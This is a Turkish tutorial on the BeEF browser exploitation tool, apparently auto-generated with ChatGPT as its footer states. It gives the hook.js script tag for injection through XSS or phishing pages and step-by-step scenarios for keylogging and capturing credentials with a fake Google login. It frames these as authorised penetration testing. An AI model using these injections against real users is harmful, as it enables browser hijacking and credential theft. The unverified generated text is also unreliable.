BeEF (Browser Exploitation Framework), Kali Linux’ta bulunan, tarayıcılar üzerinden istemcilerin güvenlik açıklarını analiz etmek ve onları kontrol etmek için kullanılan bir araçtır. BeEF, özellikle tarayıcı güvenlik açıklarına odaklanır ve Cross-Site Scripting (XSS) gibi saldırılarla tarayıcıyı istismar ederek hedef üzerinde bir dizi güvenlik testi gerçekleştirir. BeEF, saldırganın hedef tarayıcı üzerinden kontrol elde etmesine olanak tanır ve tarayıcıda çalışan istemci sistemdeki güvenlik açıklarını kullanarak daha büyük saldırılar düzenlemesine yardımcı olur.
BeEF’in Temel Özellikleri
- Tarayıcı güvenlik açıklarını analiz etme: BeEF, tarayıcıdaki güvenlik açıklarını bulur ve bu açıklardan yararlanır.
- XSS (Cross-Site Scripting) saldırılarını yönetme: BeEF, XSS açıklarını kullanarak bir tarayıcıya kötü amaçlı JavaScript enjekte edebilir.
- Zombi bilgisayarlar (hooked browsers): BeEF ile başarılı bir XSS saldırısından sonra tarayıcıyı “zombi” haline getirir ve bu tarayıcıyı kontrol etmeye başlar.
- Modüllerle genişletilebilir: BeEF, birçok farklı saldırı senaryosuna uyacak modüllerle genişletilebilir. Bu modüller, tarayıcı güvenliğiyle ilgili çeşitli testler ve saldırılar sunar.
- Sosyal mühendislik saldırıları: BeEF, tarayıcı üzerinde sosyal mühendislik saldırıları gerçekleştirebilir, sahte uyarılar gösterebilir ve kullanıcıya kötü amaçlı yazılım indirebilir.
- Tarayıcı ve işletim sistemi bilgilerini toplama: Kullanıcı hakkında tarayıcı ve sistem bilgilerini toplar.
BeEF’in Kurulumu
BeEF, Kali Linux’ta genellikle önceden yüklü olarak gelir. Eğer kurulu değilse şu komutla yükleyebilirsiniz:
sudo apt install beef-xss
Yüklendikten sonra BeEF’i başlatmak için:
sudo beef-xss
BeEF arayüzü, yerel olarak çalıştığı için web tarayıcınız üzerinden araca erişebilirsiniz. BeEF’i çalıştırdıktan sonra, aşağıdaki adrese giderek araca giriş yapabilirsiniz:
http://127.0.0.1:3000/ui/panel
- Kullanıcı adı:
beef
- Parola:
beef
Bu bilgiler, BeEF’in varsayılan kullanıcı adı ve parolasıdır, dilerseniz bunları yapılandırma dosyasından değiştirebilirsiniz (/usr/share/beef-xss/config.yaml
).
BeEF’in Temel Kullanım Adımları
- BeEF’i Başlatma ve Panele Giriş Yapma
BeEF’i başlattıktan sonra, tarayıcınıza http://127.0.0.1:3000/ui/panel
adresini yazarak giriş yapabilirsiniz. Giriş yaptıktan sonra BeEF’in kontrol paneline erişirsiniz. Bu panel, yönetici arayüzüdür ve saldırılarınızı bu arayüzden yönetebilirsiniz.
- Hook (Bağlantı) Kodu Oluşturma ve Hedefi Zombi Yapma
BeEF, tarayıcı üzerinde kontrol sağlamak için bir hook (bağlantı) JavaScript kodu kullanır. Bu hook kodu hedef tarayıcıya enjekte edildiğinde tarayıcıyı BeEF kontrolüne alır ve bu tarayıcı “zombi” olarak adlandırılır.
Hook kodu şu şekildedir:
<script src="https://<BeEF_IP>:3000/hook.js"></script>
Bu kod, tarayıcıya yerleştirildiğinde, tarayıcı BeEF ile iletişim kurmaya başlar ve BeEF panelinde bu tarayıcıyı yönetmeye başlarsınız.
Hook Kodu Nasıl Enjekte Edilir?
- XSS Açıklarıyla: Eğer hedef web sitesinde bir XSS açığı bulursanız, hook kodunu buraya enjekte edebilir ve kurbanın tarayıcısını BeEF’e bağlayabilirsiniz.
- Phishing (Oltalama) Saldırıları: Kullanıcıya sahte bir web sayfası göndererek bu sayfanın içerisine BeEF hook kodunu ekleyebilirsiniz.
- Zombi Tarayıcıları Yönetme
Bir tarayıcı BeEF’e bağlandıktan sonra, panelde “Online Browsers” (Çevrimiçi Tarayıcılar) bölümünde listelenir. Bu tarayıcıyı seçerek çeşitli saldırılar düzenleyebilir ve sistem hakkında bilgi toplayabilirsiniz.
BeEF, zombi tarayıcılar üzerinde bir dizi işlem yapmanıza olanak tanır:
- Sistem Bilgilerini Toplama: Hedef tarayıcıda kullanılan işletim sistemi, tarayıcı sürümü ve daha fazla bilgiyi toplar.
- Sosyal Mühendislik Saldırıları: Tarayıcıda sahte uyarı pencereleri, sahte oturum açma sayfaları göstererek kullanıcıdan bilgi çalabilir.
- Ağ Bilgileri Toplama: Zombi tarayıcının bulunduğu ağ hakkında bilgi toplayabilir (örneğin, yerel ağ IP adresleri).
- Komut Çalıştırma: Hedef tarayıcıda çeşitli komutlar çalıştırılabilir.
Zombi Tarayıcı Üzerinde Yürütülebilecek Bazı Modüller
- JavaScript Keylogger: Hedef tarayıcıda çalışan bir keylogger başlatarak, kullanıcı tarafından girilen tuş vuruşlarını kaydedebilirsiniz.
- Sahte Oturum Açma Penceresi: Bir sosyal mühendislik saldırısı olarak sahte oturum açma pencereleri gösterebilir ve kullanıcıdan parola bilgilerini alabilirsiniz.
- Tarayıcıda Uyarı Gösterme: Sahte uyarı mesajları ile kullanıcıyı kandırabilir, zararlı yazılım indirme girişimlerinde bulunabilirsiniz.
- İç IP Adreslerini Öğrenme: Hedef sistemin iç IP adresini öğrenmek ve ağ üzerindeki diğer cihazları keşfetmek için kullanılabilir.
Kullanım Senaryoları
1. XSS Saldırısı Yoluyla Hook Enjekte Etme
Bir web sitesinde XSS zafiyeti bulduğunuzu varsayalım. Bu zafiyet üzerinden BeEF hook kodunu enjekte ederek kurbanın tarayıcısını BeEF’e bağlayabilirsiniz.
Adımlar:
- XSS açığına sahip web sitesine hook kodunu enjekte edin:
<script src="https://127.0.0.1:3000/hook.js"></script>
- Kurban bu sayfayı ziyaret ettiğinde tarayıcısı BeEF’e bağlanacak ve zombi tarayıcı olarak görünecektir.
2. Phishing (Oltalama) Saldırısı ile Hook Enjekte Etme
Bir kullanıcıya sahte bir web sayfası göndererek BeEF hook kodunu bu sayfanın içine yerleştirebilirsiniz. Kullanıcı bu sayfayı açtığında tarayıcısı BeEF’e bağlanır ve siz bu tarayıcı üzerinde çeşitli saldırılar gerçekleştirebilirsiniz.
Adımlar:
- BeEF hook kodunu sahte bir sayfaya ekleyin.
- Kullanıcı bu sayfayı ziyaret ettiğinde tarayıcı BeEF’e bağlanır ve zombi tarayıcı olarak görünür.
3. Sosyal Mühendislik Saldırısı
Kullanıcının tarayıcısında sahte bir oturum açma penceresi gösterebilir veya bir uyarı penceresi ile kandırabilirsiniz. Örneğin, kullanıcıdan Google oturum açma bilgilerini çalmak için sahte bir giriş penceresi oluşturabilirsiniz.
Adımlar:
- BeEF panelinden zombi tarayıcıyı seçin.
- “Commands” bölümüne gidin ve Fake Google Login Dialog gibi bir modül çalıştırın.
- Hedef tarayıcıda sahte bir Google oturum açma penceresi görünecektir ve kullanıcı bilgilerini buraya girdiğinde bu bilgileri yakalayabilirsiniz.
4. Ağ Bilgilerini Toplama
Zombi haline getirdiğiniz tarayıcıda çalışan komutlar aracılığıyla, tarayıcının bulunduğu ağ hakkında bilgi toplayabilirsiniz. İç IP adresleri, yönlendirici bilgileri ve diğer ağ cihazları hakkında bilgi elde edebilirsiniz.
Adımlar:
- Zombi tarayıcıyı BeEF panelinden seçin.
- Ağ bilgilerini toplamak için uygun modülleri çalıştırın (örneğin, “Get Internal IP” modülü).
BeEF Kullanımı İçin Diğer Önemli Parametreler
- Kullanıcı adı ve parola değiştirme: Varsayılan kullanıcı adı ve parola güvenlik riskleri yaratabilir, bunları değiştirmek için
/usr/share/beef-xss/config.yaml
dosyasını düzenleyebilirsiniz. - SSL desteği: Güvenli bir ortamda BeEF’i çalıştırmak istiyorsanız, SSL desteğini aktif hale getirebilirsiniz.
- İstemci komutları: Hedef tarayıcıda komutlar çalıştırmak için BeEF’in komut modüllerini kullanabilirsiniz.
BeEF’in Etik Kullanımı
BeEF, yalnızca etik ve yasal amaçlarla kullanılmalıdır. Bu araç, saldırı simülasyonları ve güvenlik testleri için geliştirilmiştir ve yalnızca izinli hedefler üzerinde kullanılmalıdır. İzinsiz kullanım, yasa dışıdır ve ağır hukuki sonuçlara yol açabilir. Bu nedenle, BeEF’i sadece kendi ağınızda veya test izni aldığınız sistemlerde kullanmalısınız.
Sonuç
BeEF, tarayıcı güvenliğini test etmek, tarayıcılar üzerinden yapılan saldırıları simüle etmek ve XSS gibi zafiyetlerin nasıl kullanılabileceğini göstermek için çok güçlü bir araçtır. Özellikle web uygulamaları ve tarayıcı güvenliği ile ilgili testlerde kullanılır. Ancak, bu aracın yasal sınırlar içinde ve etik kurallara uygun olarak kullanılması gerektiği unutulmamalıdır.
İçerikler ChatGPT ile oluşturulmuş ve teyide muhtaç bilgilerdir.Sorun veya önerinizi iletişim sayfasından yazabilirsiniz.
Yorum Yap